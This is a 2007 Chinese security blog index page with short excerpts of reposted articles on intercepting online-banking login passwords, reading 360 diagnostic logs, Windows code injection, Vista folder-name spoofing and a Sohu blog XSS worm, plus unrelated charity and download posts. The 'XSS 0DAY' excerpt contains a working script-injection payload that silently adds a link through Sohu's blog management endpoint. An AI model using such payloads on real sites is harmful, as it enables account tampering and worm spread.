网上银行等电子支付平台的WEB登陆安全性简要分析

2007/01/09 10:05 | 鬼仔 | 技术文章 | 消灭0留言

作者:xyzreg
网站:http://www.xyzreg.net

注:图片不方便显示,PDF版下载:http://www.xyzreg.net/bank.pdf

前言:本文还是去年年初写的,当时出于安全考虑没放出来。现在部分网上银行已大幅度降低了无高级别安全措施情况下的转账限额,并建议用户使用动态口令卡或者USB Key,总体安全系数有所提高。

随着子商务的普及,网上银行以及在线电子支付等方式逐渐被网民所接受和喜爱。但是网上银行以及电子商务支付平台的安全性不容乐观。尽管各网上银行采取 SSL加密防止通过嗅探网络封包的方式截取密码;对于防止WEB登陆时密码被窃取,网上银行采取了安全控件或者动态软键盘的方法,但考虑的仍不全面,我们还是能采取相应的方法截获用户输入的密码。
阅读全文 »

十分钟看懂360系统诊断日志

2007/01/08 11:16 | 鬼仔 | 技术文章 | 消灭0留言

作者:nslog(www.nslog.cn)
日期:2007/01/08(转载请保留此申明)

写在前面
当确定一个系统可能存在问题的时候,首先要做的,就是找出系统的问题所在,这个时候我们就需要来“看懂”系统诊断日志,找出原因所在,然后再来做相应清除。虽然现在有很多的流氓清除软件,但跟杀毒软件一样,他们永远是跟着流氓软件后面在奔跑,当这个流氓是一个新出来的时候,必须要经过以下步骤:
厂商拿到样本——>分析——>加入特征码/病毒行为——>更新病毒特征库——用户下载——>查杀成功
所以有时不得以,我们需要自己来诊断一下,当然,这个诊断远没有想象的那么难。目前比较常用的诊断工具有Hijackthis,360safe,SRENG等几个软件。360safe经过几次升级,借鉴 阅读全文 »

搜狐ajax hacking漏洞详解——XSS worm

2007/01/07 9:46 | 鬼仔 | 技术文章 | 消灭0留言

鬼仔:记得以前有个 Myspace 的XSS worm。

作者:monyer
来源:梦之光芒

搜狐博客存在ajax hacking漏洞,可以实现web worm的功能,下面是具体的利用方法:

标准的ajax数据提交,该ajax的XmlHttp方式为微软msdn提供的标准方法!
阅读全文 »

Tags: , ,

向其他进程注入代码的三种方法

2007/01/06 11:01 | 鬼仔 | 技术文章 | 消灭0留言

原版地址:http://www.codeproject.com/threads/winspy.asp?df=100&forumid=16291&select=1025152&msg=1025152

pdf格式下载:
http://netxfly.blogbus.com/files/1163491746.pdf

下载整个压缩包

下载WinSpy

作者:Robert Kuster

翻译:袁晓辉([email protected]

摘要:如何向其他线程的地址空间中注入代码并在这个线程的上下文中执行之。

目录:

●导言

●Windows 钩子(Hooks)

●CreateRemoteThread 和LoadLibrary 技术

○进程间通讯

●CreateRemoteThread 和 WriteProcessmemory 技术
阅读全文 »

XSS 0DAY

2007/01/05 8:03 | 鬼仔 | 技术文章 | 消灭0留言

文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

看到梦之光芒放出来了!我也不藏了!

10月7日的时候我就发的日志,提示了大家!这里算是上次发的XSS WORM初尝试的续吧.

其实很简单,就是两次转码.

<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/link.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">

阅读全文 »

Tags:

12.15夜晚,李连杰毁掉自己形象,却塑造了高尚人格!

2007/01/05 3:49 | 鬼仔 | 心情随笔 | 10 条评论了已经

鬼仔:今天无意间看到这段视频的,这是李连杰在《黄金甲》首映式结束前,在台上做的讲演,看过之后我也发短信捐了一块钱。一块钱,相信大家都没有怎么放在心上,希望大家当作是为中国的慈善事业尽了一份力吧!
希望大家带着一颗慈善的心态去看,用自己的心去体会李连杰的心。

http://www.tudou.com/v/PXH7WA41QIw
一位网友如是说:
李连杰在2006年的12月15日的夜晚,彻底毁掉了自己的形象,我们可以听到李连杰颤抖着的声音,可以听到李连杰因情绪激动而语无伦次的话语,我们可以看到李连杰一次又一次的鞠着躬,可以看到李连杰一遍又一遍的求着记者主持们,可以看到李连杰自始至终没有稳稳的站立过….. 当娱乐圈里的名人们将 阅读全文 »

Tags:

Vista下的文件名欺骗

2007/01/05 2:29 | 鬼仔 | 技术文章 | 消灭0留言

鬼仔:我没有测试。。主要是没有环境,我机器跑不起来Vista

作者:est
来源:est's Blog

打开一个文件夹比如说,E:\test ,空白处点右键,选择 属性,选择自定义,然后可以给文件夹改个图标,这个可能地球人都知道了,不过Vista下有更好玩的东西,先随便给文件夹改个图标,点击确定,然后,打开当前文件夹下的 desktop.ini(方法就很多了,最简单:直接在地址栏的当前路径后面接着输入 \desktop.ini 回车,当然,如果你启用了“显示系统及隐藏文件”的话,直接双击打开),记事本弹出来,加这么一句:

LocalizedResourceName=Hacked By est

保存,关闭记事本。

把 desktop.ini 改名成其他,例如 desktop.ini2 阅读全文 »

Tags:

电脑报2006合订本 + 光盘:中国计算机年鉴

2007/01/03 12:09 | 鬼仔 | 乱七八糟 | 消灭0留言

1. 电脑报2006合订本 免安装去广告版本 无图15.6MB:

下载地址:http://www.xdowns.com/soft/4/136/2007/Soft_34409.html

2. 电脑报2006合订本光盘 FTP下载+电驴下载:
全套上、下两册,浓缩2006年电脑报精华文章。附录包含70余篇简明IT应用指南,覆盖软件、硬盘、数码

、网络四大领域。配赠权威实用的2006 -2007中国计算机年鉴DVD光盘,近1.4GB海量信息与资源超值奉献

。8大正版超值软件,涵盖系统维护、系统安全、办公应用、多媒体娱乐等四大领域。微软、腾讯、友立
阅读全文 »

Tags: